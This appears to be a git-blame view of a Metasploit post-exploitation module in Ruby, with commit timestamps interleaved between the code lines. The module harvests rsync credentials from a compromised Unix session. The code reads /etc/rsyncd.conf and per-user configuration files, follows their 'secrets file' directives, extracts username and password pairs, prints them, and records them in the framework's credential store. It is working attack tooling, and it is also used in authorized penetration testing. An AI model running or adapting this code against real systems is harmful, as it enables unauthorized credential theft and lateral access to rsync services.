2015-11-20 20:57:33 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2015-11-20 20:57:33 +00:00
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Unix
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(
|
|
|
|
update_info(
|
|
|
|
info,
|
|
|
|
'Name' => 'UNIX Gather RSYNC Credentials',
|
|
|
|
'Description' => %q(
|
|
|
|
Post Module to obtain credentials saved for RSYNC in various locations
|
|
|
|
),
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],
|
|
|
|
'SessionTypes' => %w(shell)
|
|
|
|
)
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2015-11-25 19:23:18 +00:00
|
|
|
OptString.new('USER_CONFIG', [false, 'Attempt to get passwords from this RSYNC ' \
|
2015-11-23 19:11:03 +00:00
|
|
|
'configuration file relative to each local user\'s home directory. Leave unset to disable.', 'rsyncd.conf'])
|
2015-11-20 20:57:33 +00:00
|
|
|
]
|
|
|
|
)
|
2015-11-22 03:50:33 +00:00
|
|
|
register_advanced_options(
|
|
|
|
[
|
|
|
|
OptString.new('RSYNCD_CONFIG', [true, 'Path to rsyncd.conf', '/etc/rsyncd.conf'])
|
|
|
|
]
|
|
|
|
)
|
2015-11-20 20:57:33 +00:00
|
|
|
end
|
|
|
|
|
2015-11-23 19:11:03 +00:00
|
|
|
def setup
|
|
|
|
@user_config = datastore['USER_CONFIG'].blank? ? nil : datastore['USER_CONFIG']
|
|
|
|
end
|
|
|
|
|
2015-11-20 20:57:33 +00:00
|
|
|
def dump_rsync_secrets(config_file)
|
2015-11-20 21:51:31 +00:00
|
|
|
vprint_status("Attempting to get RSYNC creds from #{config_file}")
|
2016-08-10 18:30:09 +00:00
|
|
|
creds_table = Rex::Text::Table.new(
|
2015-11-20 20:57:33 +00:00
|
|
|
'Header' => "RSYNC credentials from #{config_file}",
|
|
|
|
'Columns' => %w(Username Password Module)
|
|
|
|
)
|
|
|
|
|
|
|
|
# read the rsync configuration file, extracting the 'secrets file'
|
|
|
|
# directive for any rsync modules (shares) within
|
|
|
|
rsync_config = Rex::Parser::Ini.new(config_file)
|
|
|
|
# https://github.com/rapid7/metasploit-framework/issues/6265
|
|
|
|
rsync_config.each_key do |rmodule|
|
|
|
|
# XXX: Ini assumes anything on either side of the = is the key and value,
|
|
|
|
# including spaces, so we need to fix this
|
|
|
|
module_config = Hash[rsync_config[rmodule].map { |k, v| [ k.strip, v.strip ] }]
|
|
|
|
next unless (secrets_file = module_config['secrets file'])
|
|
|
|
read_file(secrets_file).split(/\n/).map do |line|
|
|
|
|
next if line =~ /^#/
|
|
|
|
if /^(?<user>[^:]+):(?<password>.*)$/ =~ line
|
|
|
|
creds_table << [ user, password, rmodule ]
|
2015-12-01 23:30:39 +00:00
|
|
|
report_rsync_cred(user, password, rmodule)
|
2015-11-20 20:57:33 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
return if creds_table.rows.empty?
|
|
|
|
|
2015-11-20 21:19:38 +00:00
|
|
|
print_line(creds_table.to_s)
|
2015-12-01 23:30:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def report_rsync_cred(user, password, rmodule)
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :session,
|
|
|
|
session_id: session_db_id,
|
|
|
|
post_reference_name: refname,
|
|
|
|
username: user,
|
|
|
|
private_data: password,
|
|
|
|
private_type: :password,
|
|
|
|
realm_value: rmodule,
|
|
|
|
# XXX: add to MDM?
|
|
|
|
#realm_key: Metasploit::Model::Realm::Key::RSYNC_MODULE,
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
credential_core = create_credential(credential_data)
|
|
|
|
|
|
|
|
login_data = {
|
|
|
|
address: session.session_host,
|
|
|
|
# TODO: rsync is 99.9% of the time on 873/TCP, but can be configured differently with the
|
|
|
|
# 'port' directive in the global part of the rsyncd configuration file.
|
|
|
|
# Unfortunately, Rex::Parser::Ini does not support parsing this just yet
|
|
|
|
port: 873,
|
|
|
|
protocol: "tcp",
|
|
|
|
service_name: "rsync",
|
|
|
|
core: credential_core,
|
|
|
|
access_level: "User",
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
create_credential_login(login_data)
|
2015-11-20 20:57:33 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
# build up a list of rsync configuration files to read, including the
|
2015-11-20 21:51:31 +00:00
|
|
|
# default location of the daemon config as well as any per-user
|
|
|
|
# configuration files that may exist (rare)
|
2015-11-22 03:50:33 +00:00
|
|
|
config_path = datastore['RSYNCD_CONFIG']
|
|
|
|
config_files = Set.new([ config_path ])
|
2015-11-23 19:11:03 +00:00
|
|
|
config_files |= enum_user_directories.map { |d| ::File.join(d, @user_config) } if @user_config
|
2015-11-20 21:19:38 +00:00
|
|
|
config_files.map { |config_file| dump_rsync_secrets(config_file) }
|
2015-11-20 20:57:33 +00:00
|
|
|
end
|
|
|
|
end
|